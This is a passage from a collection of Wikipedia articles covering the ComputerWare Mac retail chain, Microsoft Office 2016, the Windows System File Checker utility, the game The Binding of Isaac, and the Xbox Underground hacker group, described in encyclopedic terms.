heart of the financial district. Stores 4 and 5 were opened in December 1989 by acquisitions of MacOrchard in Berkeley and the Computer Center of Santa Cruz. August 1990 brought a sixth store in San Rafael through acquisition of MacGarden. This location was still in the Macintosh-only retail business as the Marin Mac Shop until mid-2010 when it closed. Two new stores opened in 1992: a seventh store was opened in Dublin in October, and then in November store number eight opened in Sunnyvale on El Camino Real through acquisition of MacShop. The hardware repair depot was moved out into its own building, across 101 on East Bayshore from the corporate headquarters in 1993. 1994 brought about the last store openings, building the ComputerWare retail chain to its height of ten stores. The San Mateo location opened in March on El Camino Real, and the Walnut Creek store was opened in December. April of that same year also brought about the move of one of the two Sunnyvale stores (the El Camino MacShop location) to Santa Clara, thereby solidifying full Bay Area coverage. In November 1995 the lease ran out on the Palo Alto headquarters location, and a larger facility that could house both the headquarters, warehouse, and hardware repair depot was found at 605 West California Avenue in Sunnyvale. ComputerWare UK ComputerWare UK, a distribution business in the UK, was founded in 1992, and although some of their products are Apple compatible, such as trackballs with large buttons and a large ball, it has nothing to do with the failed Apple stores. ComputerWare UK was founded Rik and Christeen Alexander in order to provide computer input device solutions and test equipment through Manufacturers, System Integrators, Value Added Resellers and PC Builders. The business objectives included never employing people and never selling software or services although ComputerWare UK are appointed agents acting on behalf of companies in the Middle East and Africa. Rik and Christeen are members of the Finchampstead Cricket Club. Apple authorization In November 1991, Apple fully authorized all of the ComputerWare stores as Apple Authorized Dealers; before this time, only the Santa Cruz store was an authorized dealer, limited the other stores to software, third-party hardware, cables, and other accessories. After this date, ComputerWare was able to carry the full line of Apple Macintosh products directly from Apple. In January 1997, ComputerWare received Apple Specialist Authorization from Apple Computer for its dedication to the Macintosh platform. The downfall In April 2001, ComputerWare announced that it was closing its doors. There were a number of factors that led to the demise of the ComputerWare retail chain. One of the major factors was the owner's loss of faith in Apple, as Apple began to open their own stores. The owner, David Lipson, looked for a way to sell the company, and when a last-minute deal fell through, put the entire chain into close-out and liquidated the assets. The reincarnation Elite Computers & Software bought the rights to the ComputerWare name and other assets in June 2001 and then reopened 4 of the original ComputerWare stores later in 2001. These stores were located In Capitola, Sunnyvale, Berkeley and San Rafael staffed with many of the same employees, store managers and retail management team from the old ComputerWare. The 4 reopened stores were rebranded with the new name ComputerWare by Elite Computers & Software and became the new expanded retail division of Elite Computers & Software growing from 1 to 5 retail stores in late 2001. The second downfall A number of factors lead to the second closing of the four original ComputerWare stores, now branded ComputerWare by Elite Computers & Software in addition to the original Elite Computers & Software store located directly across the street from Apples' Worldwide Headquarters in Cupertino in 2003. Pressure from multiple new Apple-owned retail stores being opened and planned near existing ComputerWare by Elite Computers & Software stores, perceived Apple-owned store new product launch allocation favoritism along with changes by Apple to its Apple Authorized Dealer Contracts contributed to the store closures. Elite Computers & Software which owned and subsequently closed the five ComputerWare by Elite Computers & Software stores, along with a growing number of Apple Authorized Dealers throughout the United States had become unhappy with what the Apple Dealers perceived as unfair treatment and unfair competition by Apple Computer, the Apple Dealers / Apple Specialists only computer supplier. This resulted in a number of Apple Dealers / Apple Specialists either closing and or filing lawsuits against Apple Computer. Most of these Apple Dealers were designated as Apple Specialist and only sold Apple Macintosh computers making this conflict a life or death situation for their stores and businesses. The San Rafael store The San Rafael (Marin) store location was reopened for a third time in 2004 under new ownership using the new name C3 Computing Corp, and later as The Marin Mac Shop, before finally closing in 2010. This former ComputerWare location was still very much like the ComputerWare of lore. The San Rafael location always remained a Macintosh-only storefront until the end. The Marin Mac Shop closed its doors in May 2010. See also External Links and Sources ComputerWare Alumni Internet Wayback Archive of MacSource.com Internet Wayback Archive of ComputerWare.com CNET News, April 3, 2001 Apple Retailer ComputerWare Closes CNET News, September 10, 2001 ComputerWare Stores to Reopen Silicon Valley/San Jose Business Journal, April 4, 2003 Macintosh Retailer Files Suit, Says Apple Deal Turned Sour References American companies established in 1985 American companies disestablished in 2001 Apple Specialists Companies based in Sunnyvale, California Computer companies established in 1985 Computer companies disestablished in 2001 Defunct companies based in the San Francisco Bay Area Defunct computer companies of the United States
45187572
https://en.wikipedia.org/wiki/Microsoft%20Office%202016
Microsoft Office 2016
Microsoft Office 2016 (First perpetual release of Office 16) is a version of the Microsoft Office productivity suite, succeeding both Office 2013 and Office for Mac 2011 and preceding Office 2019 for both platforms. It was released on macOS on July 9, 2015, and on Microsoft Windows on September 22, 2015, for Office 365 subscribers. Mainstream support ended on October 13, 2020, and extended support for most editions of Office 2016 will end on October 14, 2025, the same day as Windows 10. The perpetually licensed version on macOS and Windows was released on September 22, 2015. Office 2016 requires Windows 7 SP1, Windows Server 2008 R2 SP1 or OS X Yosemite or later. It is the last version of Microsoft Office to support Windows 7, Windows 8, early versions of Windows 10 (1803 and earlier) and the respective server releases, as the following version, Microsoft Office 2019 only supports Windows 10 version 1809 or later and Windows Server 2019. New features Windows New features in the Windows release include the ability to create, open, edit, save, and share files in the cloud straight from the desktop, a new search tool for commands available in Word, PowerPoint, Excel, Outlook, Access, Visio and Project named "Tell Me", more "Send As" options in Word and PowerPoint, and co-authoring in real time with users connected to Office Online. Other smaller features include insights, a feature powered by Bing to provide contextual information from the web, a Designer sidebar in PowerPoint to optimize the layout of slides, more new chart types and templates in Excel (such as treemap, sunburst chart (also known as a ring chart), waterfall chart, box plot and histogram, and financial and calendar templates), new animations in PowerPoint (such as the Morph transition), the ability to insert online video in OneNote, enhanced support for attachments for emails in Outlook (supporting both locally-stored files and files on OneDrive or SharePoint), a Groups feature for Outlook, and a data loss prevention feature in Word, Excel, and PowerPoint. Microsoft Office 2016 is the first in the series to support the vector graphic format SVG. Microsoft Office 2016 cannot coexist with Microsoft Office 2013 apps if both editions use Click-To-Run installer, but it can coexist with earlier versions of Microsoft Office, such as 2003, 2007, and 2010 since they use Windows Installer (MSI) technology. Microsoft requires that any 2013 versions be uninstalled, which it will offer to do automatically, before the 2016 versions can be installed. Despite not supporting Windows XP anymore, tooltips for various ribbon items (e.g. Paragraph, Font, Footnotes or Page Setup) still show screenshots of Office on Windows XP. Mac New features in the Mac release include an updated user interface that uses ribbons, full support for Retina Display, and new sharing features for Office documents. In Word, there is a new Design tab, an Insights feature, which is powered by Bing, and real-time co-authoring. In Excel, there is a Recommended Charts feature, and PivotTable Slicers. In PowerPoint, there are theme variants, which provide different color schemes for a theme. In Outlook, there is a Propose New Time feature, the ability to see calendars side by side, and a weather forecast in the calendar view. Outlook 2016 for Mac has very limited support for synchronization of collaboration services outside basic email. With version 15.25, Office for Mac transitioned from 32-bit to 64-bit by default. Users that require a 32-bit version for compatibility reasons will be able to download the 15.25 version as a manual, one-time update from the Microsoft Office website. All versions following 15.25 will be 64-bit only. Office for Mac received Touch Bar support in an update on February 16, 2017, following the launch of the 2016 MacBook Pro models. 32-bit versions of Office for Mac won't run on macOS Catalina; therefore, version 15.25 is the earliest version of Office for Mac that will run on the latest version of macOS. Support ended for this version on October 13, 2020 as Office for Mac doesn't have extended support unlike its Windows counterparts. Removed features In Office 2016 for Windows, a number of features were removed: Clip Art, and clip art offered through Office.com was removed. Images can instead be downloaded from Bing Images. Support for EPS images was removed for security reasons. The Document Information Panel was removed. Support for Exchange Server 2007 was removed from Outlook. Outlook Social Connector no longer works. PowerPoint can no longer open HTML files. Word can no longer publish blog posts to Blogger. Editions Traditional editions As with previous versions, Office 2016 is made available in several distinct editions aimed towards different markets. All traditional editions of Microsoft Office 2016 contain Word, Excel, PowerPoint and OneNote and are licensed for use on one computer. Five traditional editions of Office 2016 were released for Windows: Home & Student: This retail suite includes the core applications only - Word, Excel, PowerPoint, OneNote. Home & Business: This retail suite includes the core applications and Outlook. Standard: This suite, only available through volume licensing channels, includes the core applications, as well as Outlook and Publisher. Professional: This retail suite includes the core applications, as well as Outlook, Publisher, and Access. Professional Plus: This suite includes the core applications, as well as Outlook, Publisher, Access, and Skype for Business. Retail versions of Office 2016 for Windows use the Click-to-Run installer. Volume-licensed versions of Office 2016 use Windows Installer (MSI) technology. Some editions like Professional Plus are available in both retail (C2R) and volume (MSI) channels. Three traditional editions of Office 2016 were released for Mac: Home & Student: This retail suite includes the core applications only. Home & Business: This retail suite includes the core applications and Outlook. Standard: This suite, only available through volume licensing channels, includes the core applications and Outlook. Office 365 The Office 365 subscription services, which were previously aimed towards business and enterprise users, were expanded for Office 2016 to include new plans aimed at home use. The subscriptions allow use of the Office 2016 applications by multiple users using a software as a service model. Different plans are available for Office 365, some of which also include value-added services, such as 1 TB of OneDrive storage and 60 Skype minutes per month on the Home Premium plan. Design The user interface design of Office 2016 for Windows is relatively unchanged from its predecessor, Microsoft Office 2013. It retains the flat design that was introduced along with the Metro design language, albeit with a few modifications to the layout, in order to conform with the design of Microsoft Office Mobile. When Office 2016 was released, it came with three themes. The default theme, known as "colorful", features a solid color on the top band of the ribbon, corresponding to the color of the Office application being used, for example, a solid dark blue is featured prominently in Microsoft Word. The theme had been described as useful in making the tab headings more distinct. In addition, both the "white" and "dark grey" themes from Office 2013 are available as well, though no new backgrounds have been added, nor have any existing backgrounds been removed. A fourth "black" theme was added as part of an update in January 2016. The update was not released to users of the traditional editions. Criticism On November 13, 2018, a report initiated by the Government of the Netherlands showed that Microsoft Office 2016 and Office 365 do not comply with the GDPR, the European statute on privacy. OneNote 2016 and Publisher 2016 do not include the Tell Me search feature that was added to all other Office apps. In response to feedback, Microsoft later added the Tell Me box to the Universal Windows Platform (UWP) version of OneNote. See also List of office suites References External links 2015 software 2016 Office 2016
3085898
https://en.wikipedia.org/wiki/System%20File%20Checker
System File Checker
System File Checker (SFC) is a utility in Microsoft Windows that allows users to scan for and restore corrupted Windows system files. Overview Microsoft ships this utility with Windows 98, Windows 2000 and all subsequent versions of the Windows NT family of operating systems. In Windows Vista, Windows 7 and Windows 10, System File Checker is integrated with Windows Resource Protection (WRP), which protects registry keys and folders as well as critical system files. Under Windows Vista, sfc.exe can be used to check specific folder paths, including the Windows folder and the boot folder. Windows File Protection (WFP) works by registering for notification of file changes in Winlogon. If any changes are detected to a protected system file, the modified file is restored from a cached copy located in a compressed folder at %WinDir%\System32\dllcache. Windows Resource Protection works by setting discretionary access-control lists (DACLs) and access control lists (ACLs) defined for protected resources. Permission for full access to modify WRP-protected resources is restricted to the processes using the Windows Modules Installer service (TrustedInstaller.exe). Administrators no longer have full rights to system files. History Due to problems with Windows applications being able to overwrite system files in Windows 95, Microsoft has since implemented a number of security measures to protect system files from malicious attacks, corruptions, or problems such as DLL hell. System File Checker was first introduced on Windows 98 as a GUI utility. It offered scanning and restoration of corrupted system files by matching the version number against a database containing the original version number of the files in a fresh Windows 98 installation. This method of file protection was basic. It determined system files by file extension and file path. It was able to restore files from the installation media or a source specified by the user. Windows 98 did not offer real-time system file protection beyond file attributes; therefore, no preventive or reactive measure was available. All Windows NT-based operating systems since Windows 2000 introduced real-time file protection, called Windows File Protection (WFP). In addition, the System File Checker utility (sfc.exe) was reimplemented as a more robust command-line utility that integrated with WFP. Unlike the Windows 98 SFC utility, the new utility forces a scan of protected system files using Windows File Protection and allows the immediate silent restoration of system files from the DLLCache folder or installation media. SFC did not appear on Windows ME, as it was replaced with System File Protection (SFP). Similar to WFP, SFP offered real-time protection. Issues The System File Checker component included with versions of Windows 2000 earlier than Service Pack 4 overrode patches distributed by Microsoft; this was rectified in Windows 2000 Service Pack 4. Usage In Windows NT-based operating systems, System File Checker can be invoked via Windows Command Prompt (with Admin privilege), with the following command: sfc /scannow (to repair problems) or sfc /verifyonly (no repair) If it finds a problem, it will attempt to replace the problematic files from the DLL Cache (%WinDir%\System32\Dllcache\). If the file is not in the DLL Cache or the DLL Cache is corrupted, the user will be prompted to insert the Windows installation media or provide the network installation path. System File Checker determines the Windows installation source path from the registry values SourcePath and ServicePackSourcePath. It may keep prompting for the installation media even if the user supplies it if these values are not correctly set. In Windows Vista and onwards, files are protected using Access control lists (ACLs), however, the above command has not changed. System File Checker in Windows Vista and later Windows operating systems can scan specified files. Also, scans can be performed against an offline Windows installation folder to replace corrupt files, in case the Windows installation is not bootable. For performing offline scans, System File Checker must be run from another working installation of Windows Vista or a later operating system or from the Windows setup DVD or a recovery drive which gives access to the Windows Recovery Environment. In cases where the component store is corrupted, the "System Update Readiness tool" (CheckSUR) can be installed on Windows 7, Windows Vista, Windows Server 2008 R2 or Windows Server 2008, replaced by "Deployment Image Service and Management Tool" (DISM) for Windows 10, Windows 8.1, Windows 8, Windows Server 2012 R2 or Windows Server 2012. This tool checks the store against its own payload and repairs the corruptions that it detects by downloading required files through Windows update. References Further reading External links sfc | Microsoft Docs Use the System File Checker tool to repair missing or corrupted system files Description of Windows XP and Windows Server 2003 System File Checker (Sfc.exe) Windows administration Windows components
33251782
https://en.wikipedia.org/wiki/The%20Binding%20of%20Isaac%20%28video%20game%29
The Binding of Isaac (video game)
The Binding of Isaac is a roguelike video game designed by independent developers Edmund McMillen and Florian Himsl. It was released in 2011 for Microsoft Windows, then ported to OS X, and Linux. The game's title and plot are inspired by the Biblical story of the Binding of Isaac. In the game, Isaac's mother receives a message from God demanding the life of her son as proof of her faith, and Isaac, fearing for his life, flees into the monster-filled basement of their home where he must fight to survive. Players control Isaac or one of seven other unlockable characters through a procedurally generated dungeon in a roguelike manner, fashioned after those of The Legend of Zelda, defeating monsters in real-time combat while collecting items and power-ups to defeat bosses and eventually Isaac's mother. The game was the result of a week-long game jam between McMillen and Himsl to develop a The Legend of Zelda-inspired roguelike that allowed McMillen to showcase his feelings about both positive and negative aspects of religion that he had come to discover from conflicts between his Catholic and born again Christian family members while growing up. McMillen had considered the title a risk but one he could take after the financial success of Super Meat Boy, and released it without much fanfare to Steam in September 2011, not expecting many sales. The game soon gained popularity partially as a result of various Let's Play videos showcasing the title. McMillen and Himsl released an expansion "Wrath of the Lamb" in May 2012, but were limited from further expansion due to limitations with the Flash platform. They had started working with Nintendo in 2012 to release a 3DS version, but Nintendo later backed out of the deal, citing controversy over the game's religious themes. Developer Nicalis worked with McMillen in 2014 to complete a remake of the game, The Binding of Isaac: Rebirth, bringing additional features that McMillen had planned that exceeded Flash's limitation, as well as to improve the game's graphics and enable ports for other systems beyond personal computers, including PlayStation 4 and Vita, Xbox One, Wii U, Nintendo 3DS, and the Nintendo Switch. This remake has commonly been cited as one of the best roguelike games of all time. McMillen later worked with James Id to develop The Legend of Bum-bo, which serves as a prequel to The Binding of Isaac. The Binding of Isaac has been well-received, with critics praising the game's roguelike nature to encourage repeated playthroughs. By July 2014, McMillen reported over 3 million copies had been sold. The game has been said to contribute to renewed interest in the roguelike genre from both players and developers. Gameplay The Binding of Isaac is a top-down dungeon crawler game, presented using two-dimensional sprites, in which the player controls Isaac or other unlockable characters as they explore the dungeons located in Isaac's basement. The characters differ in speed, amount of health, amount of damage they deal, and other attributes. The game's mechanics and presentation is similar to the dungeons of The Legend of Zelda, while incorporating random, procedurally-generated levels in the manner of a roguelike game. On each floor of the basement dungeon, the player must fight monsters in a room before continuing onto the next room. This is most commonly done by the character's tears as bullets in the style of a twin-stick shooter, but the player can also use a limited supply of bombs to damage enemies and clear out parts of the room. Other methods of defeating enemies become possible as the character gains power-ups, items that are automatically worn by the player-character when picked up that can alter the character's core attributes, such as increasing health or the strength of each tear, or cause additional side effects, such as for allowing charged tear shots to be fired after holding down a controller button for a short while, or a means to fire tears behind the character. Power-ups include passive items that improve the character's attributes automatically, active power-ups that can be used once before they are recharged by completing additional rooms in the dungeon, and single-use power-ups such as pills or Tarot cards that confer a one-time benefit when used, such as regaining full health, or increasing or decreasing all attributes of the character. The effect of power-ups stack, so that the player may come into highly-beneficial power-up combinations. Once a room is cleared of monsters, it will remain clear, allowing the player to re-trace their way through the level, though once they move onto the next level, they cannot return. Along the way, the player can collect money to buy power-ups from shopkeepers, keys to unlock special treasure rooms, and new weapons and power-ups to strengthen their chances against the enemies. The player's health is tracked by a number of hearts; if the character loses all his hearts, the game ends in permadeath and the player must start over from a freshly-generated dungeon. Each floor of the dungeon includes a boss which the player must defeat before continuing to the next level. On the sixth of eight floors, the player fights Isaac's mother; after defeating her, Isaac crawls into her womb. Later levels are significantly harder, culminating in a fight against the heart of Isaac's mother on the eighth floor. An optional ninth floor, Sheol, contains the boss Satan. Winning the game with certain characters or by certain conditions unlocks new power-ups that might appear in the dungeon or the ability to use one of the other characters. The game tracks the various power-ups that the player has found over time which can be reviewed from the game's menus. Plot The Binding of Isaacs plot is very loosely inspired by the biblical story of the same name. Isaac, a child, and his mother live in a small house on a hill, both happily keeping to themselves, with Isaac drawing pictures and playing with his toys, and his mother watching Christian broadcasts on television. Isaac's mother then hears "a voice from above", a voice that she believes is that of God Himself, stating that her son is corrupted with sin, and needs to be saved. It asks her to remove all that is evil from Isaac, in an attempt to save him. His mother agrees, taking away his toys, drawings, and even his clothes. The voice once again speaks to Isaac's mother, stating that Isaac must be cut off from all that is evil in the world. Once again, his mother agrees, and locks Isaac inside his room. Once more, the voice speaks to Isaac's mother. It states that she has done well, but it still questions her devotion, and tells her to sacrifice her son. She agrees, grabbing a butcher's knife from the kitchen and walks to Isaac's room. Isaac, watching through a sizable crack in his door, starts to panic. He finds a trapdoor hidden under his rug and jumps in, just as his mother bursts through his bedroom door. Isaac then puts the paper he was drawing onto his wall, which becomes the title screen. Until The Binding of Isaac: Repentance expansion, there is no clear conclusion, or even consistent narrative, to the story past this point. The game features 13 possible endings, one after each major boss fight. The first ten endings serve as introductions to unlocked items and mechanics, while the final three suggest that Isaac climbs into a toy chest and suffocates. During the game's loading points, Isaac is shown curled up in a ball, crying. His thoughts are visible, ranging among rejection from his mother and humiliation from his peers to a scenario involving his own death. Development and release The Binding of Isaac was developed following the release of Super Meat Boy, which McMillen considered a significant risk and a large time effort. When Super Meat Boy was released to both critical praise and strong sales, he felt that he no longer had to worry about the consequences of taking risks with his finances supported by its sales. He also considered he could take further risk with the concept. He had been planning to work with Tommy Refenes, the co-developer of Super Meat Boy, on their next game, Mew-Genics, but as Refenes had taken some time off, McMillen looked to develop something he considered to be "low stress" with minimal expectations such as an Adobe Flash game. The Binding of Isaacs main concept was the result of a weeklong game jam that McMillen had with Florian Himsl; at the time, his co-contributor on Super Meat Boy, Tommy Refenes, was on vacation. The concept McMillen had was two-fold: to develop a roguelike title based on the first The Legend of Zelda game's dungeon structure, and to develop a game that addressed McMillen's thoughts on religion. McMillen had been inspired by Shigeru Miyamoto, the designer of the original Zelda games. McMillen saw the potential of the procedural generation aspect of roguelikes including in Spelunky and Desktop Dungeons, and considered that working on procedural generation would help towards development of his planned game Mew-Genics. Random rooms were created for each floor of the dungeon by selecting ten to twenty rooms from a pre-built library of 200 layouts, adding in the monsters, items, and other features, and then including fixed rooms that would be found on each floor, such as a boss room and treasure room. In expanding the gameplay, McMillen used the structure of Zeldas dungeons to design how the player would progress through the game. In a typical Zelda dungeon, according to McMillen, the player acquires a new item that helps them to progress farther in the game; he took the same inspiration to assure that each level in Isaac included at least one item and one bonus item on defeating the boss that would boost the character's attributes. McMillen also wanted to encourage players to experiment to learn how things work within Isaac, mirroring how Miyamoto had done with the original Zelda game. He designed the level progression to become more difficult with the player's progression in the game, as well as additional content that became available after beating the game as to make it feel like the game was long. McMillen designed four of the selectable characters based on the main classes of Dungeons & Dragons—fighter, thief, cleric and wizard. On the story side, McMillen explained that the religious tone is based on his own experiences with his family, split between Catholics and born-again Christians. McMillen noted that while both sides born out faith from the same Bible, their attitudes were different; he found some of the Catholic rituals his family performed inspiring, while other beliefs they had were condemning of several pastimes McMillen had participated in like Dungeons & Dragons. He took inspiration from that duality to create Isaacs narrative, showing how religion can both instill harmful feelings while also bringing about dark creativity. McMillen also considered the scare tactics used by the Christian right to condemn popular media of the 1980s, such as heavy metal and video games. McMillen noted how many of the propaganda films from this period featured satanic cults that would sacrifice children, and he noted how many Biblical stories mirrored these concepts, subsequently building the story around that. He also stated that he also tended to like "really weird stuff" relating to toilet humor and similar types of off-color humor that did not sit well with his family and which he had explored in previous games before Super Meat Boy. While Super Meat Boy helped to make his reputation (including being one of the featured developers in Indie Game: The Movie), he felt it was a "safe" game considering his preferred type of humor, and used Isaac to return to this form, considering that the game could easily be "career suicide" but would make a statement about what he really wanted to do. The Binding of Isaac began as a game jam between McMillen and Florian Himsl. Within the week, they had a working game written in Adobe Flash's ActionScript 2. The two agreed to complete it out as a game they could release on Steam though with no expectations of sales. Completion of the game from the prototype to the finished state took about 3 months with part-time development. During this time, they discovered there were several limitations on the size and scope of both Flash and ActionScript that limited how much they could do with the game, but continued to use the tools as to release the title. McMillen said that because they were not worried about sales, they were able to work with Valve to release the game without fears of censorship or having to seek an ESRB rating. Releasing through Steam also enabled them to update the game freely, several times on its initial release, an aspect that they could not do with other consoles without significant cost to themselves. They did release without significant end-user testing, as it would have taken several hundreds of users to go through all the various combinations of items that a player could collect, and McMillen recognized they had released the title with their buyers being playtesters for them. A week after the Steam release, McMillen released a demo version via the website Newgrounds. Merge Games produced a physical edition that included the game, soundtrack, and a poster, for stores in the United Kingdom in 2012. AS2 was a very outdated program at the time, and caused many low-end PCs and even high-end PCs to encounter slow down at times. AS2 also lacked controller support, and Tommy Refenes had to help write an achievement program that would allow people to unlock Steam achievements. McMillen later stated that he would not have made it in Flash at all if he had known anyone would actually care about Isaac. Soundtrack Danny Baranowsky, the game's composer and who previously worked with McMillen on Super Meat Boy, was involved early on with the project shortly after the completion of the first prototype. McMillen and Baranowsky worked back and forth, with McMillen providing artwork from the game and allowing Baranowsky to develop the musical themes based on that; this would often lead to McMillen creating more art to support the music as it progressed. Baranowsky had been drawn to The Binding of Isaac as though the game puts forth a dark tone, he stated it had rather silly undertones underneath and such that one could not take it too seriously. Some of the songs were inspired by classical choral music but modified to fit the theme of the game. Other works were inspired by boss fight songs composed by Nobuo Uematsu for the Final Fantasy series. Baranowsky also had additional time after finishing the main songs for the game to craft short additional tracks that were used for special rooms like shops and secret areas. Cancelled Nintendo 3DS port In January 2012, as the game has surpassed 450,000 units sold, McMillen stated that he was approached by a publisher that had interest in bringing the title to the Nintendo 3DS as a downloadable title through the Nintendo eShop, though McMillen had reservations given Nintendo's reputation for less risque content. In late February, McMillen stated that Nintendo had rejected the game because of "questionable religious content". He believed this stemmed from Germany's classification board rating the existing Windows version of the game as "age 16+" due to potentially blasphemous content, the first such time a game was rated in that manner in the country. McMillen noted that Nintendo executives he spoke to before this decision had noted some blasphemous content would have been acceptable, and were more concerned with overtly religious content. He also noted that he was approached about his willingness to make some changes to the game to make it more suitable for the 3DS, but never was given a list of specific changes. McMillen speculated that Nintendo was worried about its reputation; because of the game's resemblance to The Legend of Zelda, an unknowing child could potentially have downloaded the title and been shocked by the content, which would have reflected poorly on Nintendo. Several game websites were outraged at Nintendo's decision. Though disappointed with Nintendo's decision, McMillen did not think the loss of the 3DS port was a major issue, and saw a brief sales burst on Steam as the news was covered in gaming website. McMillen further praised the flexibility of the Steam platform, which does not require games to obtain ESRB ratings to be published on the service, and the freedom it gave to the publishers regardless of the game content. Nintendo would later allow the Rebirth remake to be released on both the New Nintendo 3DS and the Wii U in 2015; this came in part because Nintendo's Steve Singer (vice president of licensing), Mark Griffin (a senior manager in licensing), and Dan Adelman (the head of indie development) championed support for The Binding of Isaac. Wrath of the Lamb An expansion to the game, entitled Wrath of the Lamb, was released through Steam on May 28, 2012. McMillen was inspired to create the expansion not only due to the success of the base game, but because his wife Danielle had fully completed the base game, the first game he had written in which she had shown significant interest. The expansion adds 70% more content to the original, and contains more than 10 bosses, over 100 items, over 40 unlocks, two additional endings, and two additional optional levels. This expansion added new "alternate" floors, which can replace the normal floors, creating an alternate route through the game. These floors contain harder enemies, and a different set of bosses. Other features include a new item type, Trinkets, which have a variety of passive or triggered effects when carried, as well as new room types. McMillen had plans to release a second expansion beyond Wrath of the Lamb, but was constrained by the limits of Flash at this point. The Binding of Isaac: Rebirth Sometime in 2012 after Isaac release, McMillen was approached by Tyrone Rodriguez of Nicalis who asked if McMillen was interested in bringing the game to consoles. McMillen was interested, but insisted that they would have to reprogram the game to get around the limitations of Flash and to include Wrath of the Lamb and the second planned expansion, remaking the game's graphics in 16-bit instead of vector-based Flash graphics. Further, McMillen had wanted nothing to do with the business aspects of the game, having recounted the difficulties he had in handling this for Super Meat Boy. Nicalis agreed to these, and began work in 2012 on what would become The Binding of Isaac: Rebirth, an improved version of the title. It was released on November 4, 2014, for Microsoft Windows, OS X, Linux, PlayStation 4, and PlayStation Vita, with versions for the Wii U, New Nintendo 3DS, and Xbox One released on July 23, 2015. The game introduced numerous new playable characters, items, enemies, bosses, challenges, and room layout seeds for floors. A content pack, entitled Afterbirth was released for Rebirth starting October 2015, adding new alternate chapters, characters and items, as well as wave-based Greed mode. A second update, Afterbirth+, added further additional content and support for user-created modifications, and was released on January 3, 2017. A third and final update, Repentance added a lot of new content and bug fixes, including most of the content from Antibirth, one of the biggest fan-made expansions, such as a new alternate path through the whole game as well as numerous character variations and new final bosses. This expansion was released on March 31, 2021. Other games McMillen collaborated with James Id to develop The Legend of Bum-bo, which was released on November 12, 2019, for Windows and later for iOS and Switch. Bum-bo is described as a prequel to Isaac, and Isaac and Gish appear as characters in the game. Isaac also appears as a playable character in the fighting game Blade Strangers and the puzzle game Crystal Crisis. On June 27, 2018, Edmund McMillen announced and later released a card game adaptation in cooperation with Studio 71 titled The Binding of Isaac: Four Souls. Reception The Binding of Isaac received generally favorable reviews from game critics. On Metacritic, the game has an average of 84 out of 100 based on 30 reviews. The Binding of Isaac has been received by reviewers as a game with high replayability with the extensive range and combinations of power-ups that the player can encounter during a run-through, while providing an accessible Zelda-inspired framework that most video game players would recognize and easily come to understand. John Teti for Eurogamer praised the game for its replayability through the randomization aspects, calling it "the most accessible exploration of the roguelike idea" that he had seen. Edges similarly commented on the lure to replay the game due to its short playthrough time, calling it "an imaginative and quick-witted arcade experience that manages to be both depraved and strangely sweet by turn". GameSpot's Maxwell McGee stated that the game smartly has removed extraneous features such that "what remains is a tightly focused game that continues to feel fresh even after multiple completions". Though the game is considered to be accessible to new players, reviewers found the game to be a difficult challenge, often set by the randomness of what power-ups the player happened to acquire during a single run. Writers for The A.V. Club rated the game an A on a grading scale, and favorably compared the title to McMillen's Super Meat Boy, requiring the player to have "masochistic patience in the face of terrible odds". This difficulty was considered mitigated by the large number of possible power-ups that the game offers, most would not be seen by players until they have replayed the game many times. McGee noted that while players can review what items they have discovered prior to a run-through, this feature does not explain what each item does, leaving the effect to be determined by the player while in game. Game Informers Adam Biessener noted that while The Binding of Isaac had a number of software bugs on release that may briefly detract from the experience, "McMillen's vision shines through" in the game's playability, art style, and story. Neilie Johnson for IGN found that some players may be put off by the game's crudeness but otherwise "it's totally random, highly creative and brutally unforgiving". Similarly, Nathan Muenier for GameSpy noted the game had some shock value that one must work past, but otherwise was "imaginative" and "utterly absorbing". Alternatively, Jordan Devore for Destructoid considered the visual style of the game one of its "biggest selling points", following from McMillen's past style of dark comedy from Super Meat Boy. Baranowsky's soundtrack was found by reviewers to well-suit the themes of the game, and used appropriately to avoid extensive repetition during a playthrough. Kirk Hamilton of Kotaku called the soundtrack as the combination of several genres and the musical styles of Danny Elfman, Muse, and Final Fantasy that created something "dark and unique". The Binding of Isaac was nominated in the Best Independent Game category at the 2011 Spike Video Game Awards, but lost to Minecraft. McMillen had only expected the game to sell a few hundred copies when he released it on Steam. For the first few months of its release, sales were roughly a few hundred per day, but shortly thereafter, McMillen found sales suddenly were boosted, a fact he attributed to numerous Let's Play videos that had been published by players to showcase the game and drove sales. This popularity also drew interest by players that wanted to create custom mods for the game, which would become a factor in the design of the sequel to better support modding. By November 2012, the game sold over one million copies, with at least one-quarter of those having purchased the "Wrath of the Lamb" extension. As of July 2014, the game has sold over 3 million copies. By July 2015, following the release of Rebirth, the combined games had over 5 million units sold. The Binding of Isaac is said to be a contributing factor towards the growth of the roguelike genre since around 2010, with its success paving the way for later games that used the roguelike formula, such as FTL: Faster Than Light and Don't Starve. References External links 2011 video games Cultural depictions of Isaac Cultural depictions of Abraham Abortion in fiction Cancelled Nintendo 3DS games Criticism of Christianity Roguelike video games Dungeon crawler video games Flash games Game jam video games Indie video games Linux games MacOS games Shooter video games Single-player video games Seven deadly sins in popular culture Video games about children Video games developed in the United States Video games scored by Danny Baranowsky Video games using procedural generation Video games with expansion packs Video games about religion Windows games Child abuse in fiction Four Horsemen of the Apocalypse in popular culture
46945828
https://en.wikipedia.org/wiki/Xbox%20Underground
Xbox Underground
Xbox Underground was an international hacker group responsible for gaining unauthorized access to the computer network of Microsoft and its development partners, including Activision, Epic Games, and Valve, in order to obtain sensitive information relating to Xbox One and Xbox Live. Microsoft Microsoft's computer network was compromised repeatedly by the Xbox Underground between 2011 and 2013. According to a 65-page indictment, the hackers spent "hundreds of hours" searching through Microsoft's network copying log-in credentials, source code, technical specifications and other data. This culminated in the perpetrators carrying out a physical theft, by using stolen credentials to enter "a secure building" at Microsoft's Redmond headquarters and exiting with Xbox development kits. Group members say they were driven by a strong curiosity about Microsoft's then-unreleased Xbox One console and associated software. Beginning in or about January 2011, Microsoft was the victim of incidents of unauthorized access to its computer networks, including GDNP's protected computer network, which resulted in the theft of log-in credentials, trade secrets and intellectual property relating to its Xbox gaming system. p. 4 In or about September 2013, Alcala and Pokora brokered a physical theft, committed by A.S. and E.A., of multiple Xbox Development Kits (XDKs) from a secure building on Microsoft's Redmond, Washington campus. Using stolen access credentials to a Microsoft building, A.S. and E.A. entered the building and stole three non-public versions of the Xbox One console... p. 31 Apache helicopter simulator software The group is also accused of breaching the computer network of Zombie Studios, through which they obtained Apache helicopter simulator software developed for the United States military. David Pokora was quoted as saying: "Have you been listening to the [expletive] that I've done this past month? I have [expletive] to the U.S. military. I have [expletive] to the Australian Department of Defense ... I have every single big company – Intel, AMD, Nvidia – any game company you could name, Google, Microsoft, Disney, Warner Bros., everything." 